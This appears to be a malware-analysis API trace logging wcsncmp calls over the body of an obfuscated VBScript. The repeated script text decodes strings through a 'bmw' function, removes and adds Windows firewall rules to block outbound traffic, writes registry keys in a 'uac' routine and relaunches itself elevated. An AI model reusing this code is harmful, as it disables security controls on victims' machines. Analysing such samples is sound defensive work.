bmw(\"DDGDVFDDGDSDPFICLCPCNCL\"), bmw(\"XEADQFAENFWFTFLFWFFFRCPEDFNFQFJFXFADXETDXEQERCPEQFTFKFYGCFFFWFJFADXGBFFFXFYFAEQFJFYGAFUFAFFGBFFFXFYDEFXFJFYGAFU\")\r\n\r\n\r\nokokCHAVE7.run bmw(\"EENEXEOBVCLEVBVEPENESFABVELBVDBBVBXDGCWEGDYFEEPFDFEEGDTFGEMEWETENEGDRCPDIEREGFGENBX\"),0\r\nokokCHAVE7.run bmw(\"KETFEEUCCCRFCCCFKEYFMFLEUFGFOFFCCCPFJCCCPFLCCCSCCCPEW\"),0\r\n\r\n\r\nEnd Function\r\n\r\n\r\nSet fso = CreateObject(bmw(\"FDXEOFEEUFCFGEUFAESCLDKEUEXEQDXFLFFFGEQEYDTENEVEQEOFG\"))\r\nIf (fso.FileExists(bmw(\"WDYDPEYERFWFIFVFWEYEMFYFFFPFMFGEYEKDIEBFKEYFYFG\"))) = false Then\r\nIf WScript.Arguments.length = 0 Then\r\nDo\r\nIf (fso.FileExists(bmw(\"ODQDHEQEJFOFAFNFOEQEEFQEWFHFEEXEQECDADSFCEQFQEX\"))) = false Then\r\nSet okokCHAVE7 = CreateObject(bmw(\"EDWESEPEWEWCKDEFBFBEWETENELFFETFAEY\"))\r\nokokCHAVE7.ShellExecute bmw(\"TFXFTFDFSFJFQFUDAFFFYFF\"), Chr(34) & _\r\nWScript.ScriptFullName & Chr(34) & \" \"& bmw(\"BFDEIEK\"), \"\", bmw(\"RFQFTFMEYFR\"), 1\r\nWScript.Sleep(600000)\r\nElse\r\nindex = 1001\r\nEnd If\r\nLoop Until index > 1000\r\nelse\r\nuac\r\nindex = 1001\r\nEnd If\r\nEnd If\r\n", _String2="\r\n'' SIG '' Begin signature block", _MaxCount=0x21) returned 19 [0226.332] wcsncmp (_String1="policy = CreateObject(bmw(\"LDSDYEWFMDNEXEYCRDQFPEBFHFEFBEUFRCV\"))\r\nDim rules\r\nSet rules = policy.Rules\r\n\r\nfor each rule in rules\r\nif (InStr(rule.Name, str1)) then\r\nrule.enabled = false\r\nrules.Remove rule.name\r\nEnd If\r\nNext\r\n\r\nDim newRule\r\nSet newRule = CreateObject(bmw(\"CDJDPENFDDEEOEPCIDHDYDTFEEUEN\"))\r\nnewRule.Name = str1\r\nnewRule.Description = bmw(\"BFAEMEOFAEIBSEXEIFAEIBSCV\") & str1 & \">\"\r\nnewRule.Applicationname = str2\r\nnewRule.Protocol = PROTOCOL_TCP\r\nnewRule.LocalPorts = ALL\r\nnewRule.RemotePorts = ALL\r\nnewRule.Enabled = TRUE\r\nnewRule.Grouping = bmw(\"QDPFDFGFPFCFUEXFJFJEXFNFGCWFBFJFJCUCVDBDCDBDEDE\")\r\nnewRule.Profiles = 2147483647\r\nnewRule.Action = ACTION_BLOCK\r\nnewRule.Direction = NET_FW_RULE_DIR_OUT\r\n\r\nrules.Add newRule\r\nEnd Function\r\n\r\nFunction uac\r\nDim okokCHAVE7\r\nSet okokCHAVE7 = WScript.CreateObject(bmw(\"VESEOFFFUFLFSFWDCEOFKFHFOFO\"))\r\n\r\nokokCHAVE7.RegWrite bmw(\"QDXEBDUEPEVECEFDSDQECEVEDDQDSDXDYEEDUESEJEFDVEKENDQEIDUESEDFGFAFPFMFQFMFDFRESENFGFLFBFMFUFQESDSFSFPFPFCFLFREMFCFPFQFGFMFLESEGFMFJFGFAFGFCFQESEJFWFQFRFCFKESDUFLEXEYFJFCECELDQ\"), 0, bmw(\"JEBDNDPEODMEGDXEBDM\")\r\nokokCHAVE7.RegWrite bmw(\"DDKDNDHECEIDODRDFDDDOEIDPDDDFDKDLDQDHEFDVDRDIDWEADDDUDHEFDPESEMFCEYFDEYEPFEEFEAESEXENEYFHFDEFDFFFFCFCEOEXFEDYEOFCFDESEYEXEFDSEYEVESEMESEOFDEFDVFJFDFEEOEWEFDFEYEXFDEOEXFEDSFCEYEWFAFEDEEOEREKFGESEYFCDDENEWESEX\"), 0, bmw(\"DDUDHDJEIDGEADRDUDG\")\r\nokokCHAVE7.RegWrite bmw(\"EDLDODIEDEJDPDSDGDEDPEJDQDEDGDLDMDRDIEGDWDSDJDXEBDEDVDIEGDQETENFDFAFEFAEQFFEGEBETEYEOFAFIFEEGDGFGFDFDEPEYFFEAEPFDFEETFAEYEGDTFAEWETENETEPFEEGDWFKFEFFEPEXEGDTFDFAEXFBFFDSEYDWEPENFGFDEPDHEPFEEVFFFAFB\"), 0, bmw(\"IEADMDOENDLEFDWEADL\")\r\nokokCHAVE7.RegWrite bmw(\"CDJDMDGEBEHDEDWDTDTDGDPDVEHDWDUDGDTEEDUEXEOFDFGEJFBENEEDOERELFBEXFCEXEOFDEEDKEWFDENFBEWENFDBTDGFHEYEUEXFBENFBEEDFEXFGEWEUEXEJEMEEDEEQENELETDGFHENDUEREPEWEJFDFEFBENFC\"), bmw(\"AEUEV\")\r\nokokCHAVE7.RegWrite bmw(\"QDXEBDUEPEVDSELEIEIDUEEEKEVELEJDUEIESEJFMFDFRFUEXFPFCESEDFGFAFPFMFQFMFDFRESDYFLFRFCFPFLFCFRCIDUFVFNFJFMFPFCFPESDTFMFUFLFJFMEXFBESEIFSFLDYFLFTEXFJFGFBEJFGFEFLEXFRFSFPFCFQ\"), bmw(\"JCRCRCRCRCRCRCRCS\")\r\n\r\nokokCHAVE7.RegWrite bmw(\"CDJDMDNDOEEDUEXEOFDFGEJFBENEEDOERELFBEXFCEXEOFDEEDUENELFEFBERFDFIBTDEENEWFDENFBEEDCEWFDERDXERFBFEFCDFERFCEJEKEUENDPEXFDEREOFI\"), 00000001, bmw(\"LEDDPDREQDOEIEAEDDO\")\r\nokokCHAVE7.RegWrite bmw(\"DDKDNDODPEFDVEYEPFEFHEKFCEOEFDPESEMFCEYFDEYEPFEEFDVEOEMFFFCESFEFJBUDFEOEXFEEOFCEFDXFAENEKFEEOFDDGESFDEKELEVEODQEYFEESEPFJ\"), 00000001, bmw(\"REJDVDXEWDUEOEGEJDU\")\r\nokokCHAVE7.run bmw(\"SFSFCCKFCFOFNFFFIFGCKEPFIFNDVFEFFFEFNFDCKFSFTFAFRFTDOCKFDFIFSFAFBFLFEFD\"),0\r\nokokCHAVE7.run bmw(\"LFGEWFMCDFEFHEUESFEEYFKFHFNFICDDSFHFFEWEGFLEWFKFLCDCSEVEWFEEWFMEWCDDOEEFLDOEBDXFQCTCXCV\"),0\r\n\r\ncriarregra bmw(\"DDGDVFDDGDSDPFICLCPCNCL\"), bmw(\"XEADQFAENFWFTFLFWFFFRCPEDFNFQFJFXFADXETDXEQERCPEQFTFKFYGCFFFWFJFADXGBFFFXFYFAEQFJFYGAFUFAFFGBFFFXFYDEFXFJFYGAFU\")\r\n\r\n\r\nokokCHAVE7.run bmw(\"EENEXEOBVCLEVBVEPENESFABVELBVDBBVBXDGCWEGDYFEEPFDFEEGDTFGEMEWETENEGDRCPDIEREGFGENBX\"),0\r\nokokCHAVE7.run bmw(\"KETFEEUCCCRFCCCFKEYFMFLEUFGFOFFCCCPFJCCCPFLCCCSCCCPEW\"),0\r\n\r\n\r\nEnd Function\r\n\r\n\r\nSet fso = CreateObject(bmw(\"FDXEOFEEUFCFGEUFAESCLDKEUEXEQDXFLFFFGEQEYDTENEVEQEOFG\"))\r\nIf (fso.FileExists(bmw(\"WDYDPEYERFWFIFVFWEYEMFYFFFPFMFGEYEKDIEBFKEYFYFG\"))) = false Then\r\nIf WScript.Arguments.length = 0 Then\r\nDo\r\nIf (fso.FileExists(bmw(\"ODQDHEQEJFOFAFNFOEQEEFQEWFHFEEXEQECDADSFCEQFQEX\"))) = false Then\r\nSet okokCHAVE7 = CreateObject(bmw(\"EDWESEPEWEWCKDEFBFBEWETENELFFETFAEY\"))\r\nokokCHAVE7.ShellExecute bmw(\"TFXFTFDFSFJFQFUDAFFFYFF\"), Chr(34) & _\r\nWScript.ScriptFullName & Chr(34) & \" \"& bmw(\"BFDEIEK\"), \"\", bmw(\"RFQFTFMEYFR\"), 1\r\nWScript.Sleep(600000)\r\nElse\r\nindex = 1001\r\nEnd If\r\nLoop Until index > 1000\r\nelse\r\nuac\r\nindex = 1001\r\nEnd If\r\nEnd If\r\n", _String2="\r\n'' SIG '' Begin signature block", _MaxCount=0x21) returned 99 [0226.332] wcsncmp (_String1="olicy = CreateObject(bmw(\"LDSDYEWFMDNEXEYCRDQFPEBFHFEFBEUFRCV\"))\r\nDim rules\r\nSet rules = policy.Rules\r\n\r\nfor each rule in rules\r\nif (InStr(rule.Name, str1)) then\r\nrule.enabled = false\r\nrules.Remove rule.name\r\nEnd If\r\nNext\r\n\r\nDim newRule\r\nSet newRule = CreateObject(bmw(\"CDJDPENFDDEEOEPCIDHDYDTFEEUEN\"))\r\nnewRule.Name = str1\r\nnewRule.Description = bmw(\"BFAEMEOFAEIBSEXEIFAEIBSCV\") & str1 & \">\"\r\nnewRule.Applicationname = str2\r\nnewRule.Protocol = PROTOCOL_TCP\r\nnewRule.LocalPorts = ALL\r\nnewRule.RemotePorts = ALL\r\nnewRule.Enabled = TRUE\r\nnewRule.Grouping = bmw(\"QDPFDFGFPFCFUEXFJFJEXFNFGCWFBFJFJCUCVDBDCDBDEDE\")\r\nnewRule.Profiles = 2147483647\r\nnewRule.Action = ACTION_BLOCK\r\nnewRule.Direction = NET_FW_RULE_DIR_OUT\r\n\r\nrules.Add newRule\r\nEnd Function\r\n\r\nFunction uac\r\nDim okokCHAVE7\r\nSet okokCHAVE7 = WScript.CreateObject(bmw(\"VESEOFFFUFLFSFWDCEOFKFHFOFO\"))\r\n\r\nokokCHAVE7.RegWrite bmw(\"QDXEBDUEPEVECEFDSDQECEVEDDQDSDXDYEEDUESEJEFDVEKENDQEIDUESEDFGFAFPFMFQFMFDFRESENFGFLFBFMFUFQESDSFSFPFPFCFLFREMFCFPFQFGFMFLESEGFMFJFGFAFGFCFQESEJFWFQFRFCFKESDUFLEXEYFJFCECELDQ\"), 0, bmw(\"JEBDNDPEODMEGDXEBDM\")\r\nokokCHAVE7.RegWrite bmw(\"DDKDNDHECEIDODRDFDDDOEIDPDDDFDKDLDQDHEFDVDRDIDWEADDDUDHEFDPESEMFCEYFDEYEPFEEFEAESEXENEYFHFDEFDFFFFCFCEOEXFEDYEOFCFDESEYEXEFDSEYEVESEMESEOFDEFDVFJFDFEEOEWEFDFEYEXFDEOEXFEDSFCEYEWFAFEDEEOEREKFGESEYFCDDENEWESEX\"), 0, bmw(\"DDUDHDJEIDGEADRDUDG\")\r\nokokCHAVE7.RegWrite bmw(\"EDLDODIEDEJDPDSDGDEDPEJDQDEDGDLDMDRDIEGDWDSDJDXEBDEDVDIEGDQETENFDFAFEFAEQFFEGEBETEYEOFAFIFEEGDGFGFDFDEPEYFFEAEPFDFEETFAEYEGDTFAEWETENETEPFEEGDWFKFEFFEPEXEGDTFDFAEXFBFFDSEYDWEPENFGFDEPDHEPFEEVFFFAFB\"), 0, bmw(\"IEADMDOENDLEFDWEADL\")\r\nokokCHAVE7.RegWrite bmw(\"CDJDMDGEBEHDEDWDTDTDGDPDVEHDWDUDGDTEEDUEXEOFDFGEJFBENEEDOERELFBEXFCEXEOFDEEDKEWFDENFBEWENFDBTDGFHEYEUEXFBENFBEEDFEXFGEWEUEXEJEMEEDEEQENELETDGFHENDUEREPEWEJFDFEFBENFC\"), bmw(\"AEUEV\")\r\nokokCHAVE7.RegWrite bmw(\"QDXEBDUEPEVDSELEIEIDUEEEKEVELEJDUEIESEJFMFDFRFUEXFPFCESEDFGFAFPFMFQFMFDFRESDYFLFRFCFPFLFCFRCIDUFVFNFJFMFPFCFPESDTFMFUFLFJFMEXFBESEIFSFLDYFLFTEXFJFGFBEJFGFEFLEXFRFSFPFCFQ\"), bmw(\"JCRCRCRCRCRCRCRCS\")\r\n\r\nokokCHAVE7.RegWrite bmw(\"CDJDMDNDOEEDUEXEOFDFGEJFBENEEDOERELFBEXFCEXEOFDEEDUENELFEFBERFDFIBTDEENEWFDENFBEEDCEWFDERDXERFBFEFCDFERFCEJEKEUENDPEXFDEREOFI\"), 00000001, bmw(\"LEDDPDREQDOEIEAEDDO\")\r\nokokCHAVE7.RegWrite bmw(\"DDKDNDODPEFDVEYEPFEFHEKFCEOEFDPESEMFCEYFDEYEPFEEFDVEOEMFFFCESFEFJBUDFEOEXFEEOFCEFDXFAENEKFEEOFDDGESFDEKELEVEODQEYFEESEPFJ\"), 00000001, bmw(\"REJDVDXEWDUEOEGEJDU\")\r\nokokCHAVE7.run bmw(\"SFSFCCKFCFOFNFFFIFGCKEPFIFNDVFEFFFEFNFDCKFSFTFAFRFTDOCKFDFIFSFAFBFLFEFD\"),0\r\nokokCHAVE7.run bmw(\"LFGEWFMCDFEFHEUESFEEYFKFHFNFICDDSFHFFEWEGFLEWFKFLCDCSEVEWFEEWFMEWCDDOEEFLDOEBDXFQCTCXCV\"),0\r\n\r\ncriarregra bmw(\"DDGDVFDDGDSDPFICLCPCNCL\"), bmw(\"XEADQFAENFWFTFLFWFFFRCPEDFNFQFJFXFADXETDXEQERCPEQFTFKFYGCFFFWFJFADXGBFFFXFYFAEQFJFYGAFUFAFFGBFFFXFYDEFXFJFYGAFU\")\r\n\r\n\r\nokokCHAVE7.run bmw(\"EENEXEOBVCLEVBVEPENESFABVELBVDBBVBXDGCWEGDYFEEPFDFEEGDTFGEMEWETENEGDRCPDIEREGFGENBX\"),0\r\nokokCHAVE7.run bmw(\"KETFEEUCCCRFCCCFKEYFMFLEUFGFOFFCCCPFJCCCPFLCCCSCCCPEW\"),0\r\n\r\n\r\nEnd Function\r\n\r\n\r\nSet fso = CreateObject(bmw(\"FDXEOFEEUFCFGEUFAESCLDKEUEXEQDXFLFFFGEQEYDTENEVEQEOFG\"))\r\nIf (fso.FileExists(bmw(\"WDYDPEYERFWFIFVFWEYEMFYFFFPFMFGEYEKDIEBFKEYFYFG\"))) = false Then\r\nIf WScript.Arguments.length = 0 Then\r\nDo\r\nIf (fso.FileExists(bmw(\"ODQDHEQEJFOFAFNFOEQEEFQEWFHFEEXEQECDADSFCEQFQEX\"))) = false Then\r\nSet okokCHAVE7 = CreateObject(bmw(\"EDWESEPEWEWCKDEFBFBEWETENELFFETFAEY\"))\r\nokokCHAVE7.ShellExecute bmw(\"TFXFTFDFSFJFQFUDAFFFYFF\"), Chr(34) & _\r\nWScript.ScriptFullName & Chr(34) & \" \"& bmw(\"BFDEIEK\"), \"\", bmw(\"RFQFTFMEYFR\"), 1\r\nWScript.Sleep(600000)\r\nElse\r\nindex = 1001\r\nEnd If\r\nLoop Until index > 1000\r\nelse\r\nuac\r\nindex = 1001\r\nEnd If\r\nEnd If\r\n", _String2="\r\n'' SIG '' Begin signature block", _MaxCount=0x21) returned 98 [0226.332] wcsncmp (_String1="licy = CreateObject(bmw(\"LDSDYEWFMDNEXEYCRDQFPEBFHFEFBEUFRCV\"))\r\nDim rules\r\nSet rules = policy.Rules\r\n\r\nfor each rule in rules\r\nif (InStr(rule.Name, str1)) then\r\nrule.enabled = false\r\nrules.Remove rule.name\r\nEnd If\r\nNext\r\n\r\nDim newRule\r\nSet newRule = CreateObject(bmw(\"CDJDPENFDDEEOEPCIDHDYDTFEEUEN\"))\r\nnewRule.Name = str1\r\nnewRule.Description = bmw(\"BFAEMEOFAEIBSEXEIFAEIBSCV\") & str1 & \">\"\r\nnewRule.Applicationname = str2\r\nnewRule.Protocol = PROTOCOL_TCP\r\nnewRule.LocalPorts = ALL\r\nnewRule.RemotePorts = ALL\r\nnewRule.Enabled = TRUE\r\nnewRule.Grouping = bmw(\"QDPFDFGFPFCFUEXFJFJEXFNFGCWFBFJFJCUCVDBDCDBDEDE\")\r\nnewRule.Profiles = 2147483647\r\nnewRule.Action = ACTION_BLOCK\r\nnewRule.Direction = NET_FW_RULE_DIR_OUT\r\n\r\nrules.Add newRule\r\nEnd Function\r\n\r\nFunction uac\r\nDim okokCHAVE7\r\nSet okokCHAVE7 = WScript.CreateObject(bmw(\"VESEOFFFUFLFSFWDCEOFKFHFOFO\"))\r\n\r\nokokCHAVE7.RegWrite bmw(\"QDXEBDUEPEVECEFDSDQECEVEDDQDSDXDYEEDUESEJEFDVEKENDQEIDUESEDFGFAFPFMFQFMFDFRESENFGFLFBFMFUFQESDSFSFPFPFCFLFREMFCFPFQFGFMFLESEGFMFJFGFAFGFCFQESEJFWFQFRFCFKESDUFLEXEYFJFCECELDQ\"), 0, bmw(\"JEBDNDPEODMEGDXEBDM\")\r\nokokCHAVE7.RegWrite bmw(\"DDKDNDHECEIDODRDFDDDOEIDPDDDFDKDLDQDHEFDVDRDIDWEADDDUDHEFDPESEMFCEYFDEYEPFEEFEAESEXENEYFHFDEFDFFFFCFCEOEXFEDYEOFCFDESEYEXEFDSEYEVESEMESEOFDEFDVFJFDFEEOEWEFDFEYEXFDEOEXFEDSFCEYEWFAFEDEEOEREKFGESEYFCDDENEWESEX\"), 0, bmw(\"DDUDHDJEIDGEADRDUDG\")\r\nokokCHAVE7.RegWrite bmw(\"EDLDODIEDEJDPDSDGDEDPEJDQDEDGDLDMDRDIEGDWDSDJDXEBDEDVDIEGDQETENFDFAFEFAEQFFEGEBETEYEOFAFIFEEGDGFGFDFDEPEYFFEAEPFDFEETFAEYEGDTFAEWETENETEPFEEGDWFKFEFFEPEXEGDTFDFAEXFBFFDSEYDWEPENFGFDEPDHEPFEEVFFFAFB\"), 0, bmw(\"IEADMDOENDLEFDWEADL\")\r\nokokCHAVE7.RegWrite bmw(\"CDJDMDGEBEHDEDWDTDTDGDPDVEHDWDUDGDTEEDUEXEOFDFGEJFBENEEDOERELFBEXFCEXEOFDEEDKEWFDENFBEWENFDBTDGFHEYEUEXFBENFBEEDFEXFGEWEUEXEJEMEEDEEQENELETDGFHENDUEREPEWEJFDFEFBENFC\"), bmw(\"AEUEV\")\r\nokokCHAVE7.RegWrite bmw(\"QDXEBDUEPEVDSELEIEIDUEEEKEVELEJDUEIESEJFMFDFRFUEXFPFCESEDFGFAFPFMFQFMFDFRESDYFLFRFCFPFLFCFRCIDUFVFNFJFMFPFCFPESDTFMFUFLFJFMEXFBESEIFSFLDYFLFTEXFJFGFBEJFGFEFLEXFRFSFPFCFQ\"), bmw(\"JCRCRCRCRCRCRCRCS\")\r\n\r\nokokCHAVE7.RegWrite bmw(\"CDJDMDNDOEEDUEXEOFDFGEJFBENEEDOERELFBEXFCEXEOFDEEDUENELFEFBERFDFIBTDEENEWFDENFBEEDCEWFDERDXERFBFEFCDFERFCEJEKEUENDPEXFDEREOFI\"), 00000001, bmw(\"LEDDPDREQDOEIEAEDDO\")\r\nokokCHAVE7.RegWrite bmw(\"DDKDNDODPEFDVEYEPFEFHEKFCEOEFDPESEMFCEYFDEYEPFEEFDVEOEMFFFCESFEFJBUDFEOEXFEEOFCEFDXFAENEKFEEOFDDGESFDEKELEVEODQEYFEESEPFJ\"), 00000001, bmw(\"REJDVDXEWDUEOEGEJDU\")\r\nokokCHAVE7.run bmw(\"SFSFCCKFCFOFNFFFIFGCKEPFIFNDVFEFFFEFNFDCKFSFTFAFRFTDOCKFDFIFSFAFBFLFEFD\"),0\r\nokokCHAVE7.run bmw(\"LFGEWFMCDFEFHEUESFEEYFKFHFNFICDDSFHFFEWEGFLEWFKFLCDCSEVEWFEEWFMEWCDDOEEFLDOEBDXFQCTCXCV\"),0\r\n\r\ncriarregra bmw(\"DDGDVFDDGDSDPFICLCPCNCL\"), bmw(\"XEADQFAENFWFTFLFWFFFRCPEDFNFQFJFXFADXETDXEQERCPEQFTFKFYGCFFFWFJFADXGBFFFXFYFAEQFJFYGAFUFAFFGBFFFXFYDEFXFJFYGAFU\")\r\n\r\n\r\nokokCHAVE7.run bmw(\"EENEXEOBVCLEVBVEPENESFABVELBVDBBVBXDGCWEGDYFEEPFDFEEGDTFGEMEWETENEGDRCPDIEREGFGENBX\"),0\r\nokokCHAVE7.run bmw(\"KETFEEUCCCRFCCCFKEYFMFLEUFGFOFFCCCPFJCCCPFLCCCSCCCPEW\"),0\r\n\r\n\r\nEnd Function\r\n\r\n\r\nSet fso = CreateObject(bmw(\"FDXEOFEEUFCFGEUFAESCLDKEUEXEQDXFLFFFGEQEYDTENEVEQEOFG\"))\r\nIf (fso.FileExists(bmw(\"WDYDPEYERFWFIFVFWEYEMFYFFFPFMFGEYEKDIEBFKEYFYFG\"))) = false Then\r\nIf WScript.Arguments.length = 0 Then\r\nDo\r\nIf (fso.FileExists(bmw(\"ODQDHEQEJFOFAFNFOEQEEFQEWFHFEEXEQECDADSFCEQFQEX\"))) = false Then\r\nSet okokCHAVE7 = CreateObject(bmw(\"EDWESEPEWEWCKDEFBFBEWETENELFFETFAEY\"))\r\nokokCHAVE7.ShellExecute bmw(\"TFXFTFDFSFJFQFUDAFFFYFF\"), Chr(34) & _\r\nWScript.ScriptFullName & Chr(34) & \" \"& bmw(\"BFDEIEK\"), \"\", bmw(\"RFQFTFMEYFR\"), 1\r\nWScript.Sleep(600000)\r\nElse\r\nindex = 1001\r\nEnd If\r\nLoop Until index > 1000\r\nelse\r\nuac\r\nindex = 1001\r\nEnd If\r\nEnd If\r\n", _String2="\r\n'' SIG '' Begin signature block", _MaxCount=0x21) returned 95 [0226.333] wcsncmp (_String1="icy = CreateObject(bmw(\"LDSDYEWFMDNEXEYCRDQFPEBFHFEFBEUFRCV\"))\r\nDim rules\r\nSet rules = policy.Rules\r\n\r\nfor each rule in rules\r\nif (InStr(rule.Name, str1)) then\r\nrule.enabled = false\r\nrules.Remove rule.name\r\nEnd If\r\nNext\r\n\r\nDim newRule\r\nSet newRule = CreateObject(bmw(\"CDJDPENFDDEEOEPCIDHDYDTFEEUEN\"))\r\nnewRule.Name = str1\r\nnewRule.Description = bmw(\"BFAEMEOFAEIBSEXEIFAEIBSCV\") & str1 & \">\"\r\nnewRule.Applicationname = str2\r\nnewRule.Protocol = PROTOCOL_TCP\r\nnewRule.LocalPorts = ALL\r\nnewRule.RemotePorts = ALL\r\nnewRule.Enabled = TRUE\r\nnewRule.Grouping = bmw(\"QDPFDFGFPFCFUEXFJFJEXFNFGCWFBFJFJCUCVDBDCDBDEDE\")\r\nnewRule.Profiles = 2147483647\r\nnewRule.Action = ACTION_BLOCK\r\nnewRule.Direction = NET_FW_RULE_DIR_OUT\r\n\r\nrules.Add newRule\r\nEnd Function\r\n\r\nFunction uac\r\nDim okokCHAVE7\r\nSet okokCHAVE7 = WScript.CreateObject(bmw(\"VESEOFFFUFLFSFWDCEOFKFHFOFO\"))\r\n\r\nokokCHAVE7.RegWrite bmw(\"QDXEBDUEPEVECEFDSDQECEVEDDQDSDXDYEEDUESEJEFDVEKENDQEIDUESEDFGFAFPFMFQFMFDFRESENFGFLFBFMFUFQESDSFSFPFPFCFLFREMFCFPFQFGFMFLESEGFMFJFGFAFGFCFQESEJFWFQFRFCFKESDUFLEXEYFJFCECELDQ\"), 0, bmw(\"JEBDNDPEODMEGDXEBDM\")\r\nokokCHAVE7.RegWrite bmw(\"DDKDNDHECEIDODRDFDDDOEIDPDDDFDKDLDQDHEFDVDRDIDWEADDDUDHEFDPESEMFCEYFDEYEPFEEFEAESEXENEYFHFDEFDFFFFCFCEOEXFEDYEOFCFDESEYEXEFDSEYEVESEMESEOFDEFDVFJFDFEEOEWEFDFEYEXFDEOEXFEDSFCEYEWFAFEDEEOEREKFGESEYFCDDENEWESEX\"), 0, bmw(\"DDUDHDJEIDGEADRDUDG\")\r\nokokCHAVE7.RegWrite bmw(\"EDLDODIEDEJDPDSDGDEDPEJDQDEDGDLDMDRDIEGDWDSDJDXEBDEDVDIEGDQETENFDFAFEFAEQFFEGEBETEYEOFAFIFEEGDGFGFDFDEPEYFFEAEPFDFEETFAEYEGDTFAEWETENETEPFEEGDWFKFEFFEPEXEGDTFDFAEXFBFFDSEYDWEPENFGFDEPDHEPFEEVFFFAFB\"), 0, bmw(\"IEADMDOENDLEFDWEADL\")\r\nokokCHAVE7.RegWrite bmw(\"CDJDMDGEBEHDEDWDTDTDGDPDVEHDWDUDGDTEEDUEXEOFDFGEJFBENEEDOERELFBEXFCEXEOFDEEDKEWFDENFBEWENFDBTDGFHEYEUEXFBENFBEEDFEXFGEWEUEXEJEMEEDEEQENELETDGFHENDUEREPEWEJFDFEFBENFC\"), bmw(\"AEUEV\")\r\nokokCHAVE7.RegWrite bmw(\"QDXEBDUEPEVDSELEIEIDUEEEKEVELEJDUEIESEJFMFDFRFUEXFPFCESEDFGFAFPFMFQFMFDFRESDYFLFRFCFPFLFCFRCIDUFVFNFJFMFPFCFPESDTFMFUFLFJFMEXFBESEIFSFLDYFLFTEXFJFGFBEJFGFEFLEXFRFSFPFCFQ\"), bmw(\"JCRCRCRCRCRCRCRCS\")\r\n\r\nokokCHAVE7.RegWrite bmw(\"CDJDMDNDOEEDUEXEOFDFGEJFBENEEDOERELFBEXFCEXEOFDEEDUENELFEFBERFDFIBTDEENEWFDENFBEEDCEWFDERDXERFBFEFCDFERFCEJEKEUENDPEXFDEREOFI\"), 00000001, bmw(\"LEDDPDREQDOEIEAEDDO\")\r\nokokCHAVE7.RegWrite bmw(\"DDKDNDODPEFDVEYEPFEFHEKFCEOEFDPESEMFCEYFDEYEPFEEFDVEOEMFFFCESFEFJBUDFEOEXFEEOFCEFDXFAENEKFEEOFDDGESFDEKELEVEODQEYFEESEPFJ\"), 00000001, bmw(\"REJDVDXEWDUEOEGEJDU\")\r\nokokCHAVE7.run bmw(\"SFSFCCKFCFOFNFFFIFGCKEPFIFNDVFEFFFEFNFDCKFSFTFAFRFTDOCKFDFIFSFAFBFLFEFD\"),0\r\nokokCHAVE7.run bmw(\"LFGEWFMCDFEFHEUESFEEYFKFHFNFICDDSFHFFEWEGFLEWFKFLCDCSEVEWFEEWFMEWCDDOEEFLDOEBDXFQCTCXCV\"),0\r\n\r\ncriarregra bmw(\"DDGDVFDDGDSDPFICLCPCNCL\"), bmw(\"XEADQFAENFWFTFLFWFFFRCPEDFNFQFJFXFADXETDXEQERCPEQFTFKFYGCFFFWFJFADXGBFFFXFYFAEQFJFYGAFUFAFFGBFFFXFYDEFXFJFYGAFU\")\r\n\r\n\r\nokokCHAVE7.run bmw(\"EENEXEOBVCLEVBVEPENESFABVELBVDBBVBXDGCWEGDYFEEPFDFEEGDTFGEMEWETENEGDRCPDIEREGFGENBX\"),0\r\nokokCHAVE7.run bmw(\"KETFEEUCCCRFCCCFKEYFMFLEUFGFOFFCCCPFJCCCPFLCCCSCCCPEW\"),0\r\n\r\n\r\nEnd Function\r\n\r\n\r\nSet fso = CreateObject(bmw(\"FDXEOFEEUFCFGEUFAESCLDKEUEXEQDXFLFFFGEQEYDTENEVEQEOFG\"))\r\nIf (fso.FileExists(bmw(\"WDYDPEYERFWFIFVFWEYEMFYFFFPFMFGEYEKDIEBFKEYFYFG\"))) = false Then\r\nIf WScript.Arguments.length = 0 Then\r\nDo\r\nIf (fso.FileExists(bmw(\"ODQDHEQEJFOFAFNFOEQEEFQEWFHFEEXEQECDADSFCEQFQEX\"))) = false Then\r\nSet okokCHAVE7 = CreateObject(bmw(\"EDWESEPEWEWCKDEFBFBEWETENELFFETFAEY\"))\r\nokokCHAVE7.ShellExecute bmw(\"TFXFTFDFSFJFQFUDAFFFYFF\"), Chr(34) & _\r\nWScript.ScriptFullName & Chr(34) & \" \"& bmw(\"BFDEIEK\"), \"\", bmw(\"RFQFTFMEYFR\"), 1\r\nWScript.Sleep(600000)\r\nElse\r\nindex = 1001\r\nEnd If\r\nLoop Until index > 1000\r\nelse\r\nuac\r\nindex = 1001\r\nEnd If\r\nEnd If\r\n", _String2="\r\n'' SIG '' Begin signature block", _MaxCount=0x21) returned 92 [0226.333] wcsncmp (_String1="cy = CreateObject(bmw(\"LDSDYEWFMDNEXEYCRDQFPEBFHFEFBEUFRCV\"))\r\nDim rules\r\nSet rules = policy.Rules\r\n\r\nfor each rule in rules\r\nif (InStr(rule.Name, str1)) then\r\nrule.enabled = false\r\nrules.Remove rule.name\r\nEnd If\r\nNext\r\n\r\nDim newRule\r\nSet newRule = CreateObject(bmw(\"CDJDPENFDDEEOEPCIDHDYDTFEEUEN\"))\r\nnewRule.Name = str1\r\nnewRule.Description = bmw(\"BFAEMEOFAEIBSEXEIFAEIBSCV\") & str1 & \">\"\r\nnewRule.Applicationname = str2\r\nnewRule.Protocol = PROTOCOL_TCP\r\nnewRule.LocalPorts = ALL\r\nnewRule.RemotePorts = ALL\r\nnewRule.Enabled = TRUE\r\nnewRule.Grouping = bmw(\"QDPFDFGFPFCFUEXFJFJEXFNFGCWFBFJFJCUCVDBDCDBDEDE\")\r\nnewRule.Profiles = 2147483647\r\nnewRule.Action = ACTION_BLOCK\r\nnewRule.Direction = NET_FW_RULE_DIR_OUT\r\n\r\nrules.Add newRule\r\nEnd Function\r\n\r\nFunction uac\r\nDim okokCHAVE7\r\nSet okokCHAVE7 = WScript.CreateObject(bmw(\"VESEOFFFUFLFSFWDCEOFKFHFOFO\"))\r\n\r\nokokCHAVE7.RegWrite bmw(\"QDXEBDUEPEVECEFDSDQECEVEDDQDSDXDYEEDUESEJEFDVEKENDQEIDUESEDFGFAFPFMFQFMFDFRESENFGFLFBFMFUFQESDSFSFPFPFCFLFREMFCFPFQFGFMFLESEGFMFJFGFAFGFCFQESEJFWFQFRFCFKESDUFLEXEYFJFCECELDQ\"), 0, bmw(\"JEBDNDPEODMEGDXEBDM\")\r\nokokCHAVE7.RegWrite 